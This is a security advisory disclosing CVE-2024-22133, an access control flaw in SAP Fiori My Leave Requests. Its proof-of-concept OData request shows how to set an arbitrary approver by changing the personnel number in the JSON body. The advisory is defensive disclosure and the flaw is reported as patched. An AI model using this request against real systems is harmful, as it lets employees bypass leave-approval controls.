usd-2023-0042 | Improper Access Control in Leave Requests

Advisory ID: usd-2023-0042
Product: SAP Fiori - My Leave Requests (Version 3/Fiori 2.0)
Affected Version: Component: GBX01HR5 605 0020, Support Package: SAPK-60520INGBX01HR5
Vulnerability Type: CWE-284: Improper Access Control
Security Risk: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N (Medium)
Vendor URL: https://www.sap.com
Vendor Acknowledged Vulnerability: Yes
Vendor Status: Fixed
CVE Number: CVE-2024-22133
CVE Link: CVE-2024-22133

Affected Component(s)

SAP Fiori Applikation My Leave Requests (Version 3/Fiori 2.0)
https://fioriappslibrary.hana.ondemand.com/sap/fix/externalViewer/#/detail/Apps('F1311A')/W38

Desciption

Leave requests can be submitted via the application. The respective supervisor is stored as the approver, who cannot be changed via the front end.

Via the OData backend API call, which is sent as soon as a leave request is sent, any other employee can be set as the approver.

Proof of Concept

During a leave request, the following request will be sent to the OData backend:

POST /sap/opu/odata/sap/HCMFAB_LEAVE_REQUEST_CR_SRV/$batch?sap-client=001 HTTP/2
Host: <sap-fiori-host>

[...]

 

--batch_ee60-88db-eb95

Content-Type: multipart/mixed; boundary=changeset_4f6a-f52d-09f8

--changeset_4f6a-f52d-09f8

Content-Type: application/http
Content-Transfer-Encoding: binary

POST LeaveRequestSet?sap-client=001 HTTP/1.1
Content-Type: application/jsonsap-context
id-accept: header
Accept: application/json
x-csrf-token: GArPMRDcc1-LL4y1wfsAIA==
Accept-Language: en
DataServiceVersion: 2.0
MaxDataServiceVersion: 2.0
Content-Length: 375

{
"StartDate":"\/Date(1702252800000)\/","EndDate":"\/Date(1702252800000)\/","StartTime":"","EndTime":"",
"__metadata":{"type":"HCMFAB_LEAVE_REQUEST_CR_SRV.LeaveRequest"},
"EmployeeID":"00204915","AbsenceTypeName":"Urlaub","AbsenceTypeCode":"0100",
"ApproverLvl1":{"Name":"<ApproverName>","Pernr":"00204914","Seqnr":"001","DefaultFlag":false},
"Notes":"","IsMultiLevelApproval":false
}

--changeset_4f6a-f52d-09f8--

--batch_ee60-88db-eb95--

 

As can be seen in line 28, the approver is also sent by the client. This means that any other personnel number can be set as the approver. If the own personnel number is set, the leave request will be created correctly. However, it is not possible to approve the leave request yourself. However, as already mentioned, each personnel number can be specified by another person who can then approve the application.

Fix

It is recommended to restrict access to sensitive functions or information by default. Required access privileges should be granted explicitly by a global access control mechanism. Furthermore, the approver should not be manipulable by the client

References

https://cwe.mitre.org/data/definitions/284.html

Timeline

  • 2023-12-06: First contact request via SAP's Vulnerability Disclosure Form.
  • 2023-12-21: The vulnerability is confirmed by SAP and a fix is in the works.
  • 2024-05-12: SAP released the patch in SAP Note 3417399.

Credits

This security vulnerability was identified by Ole Wagner of usd AG.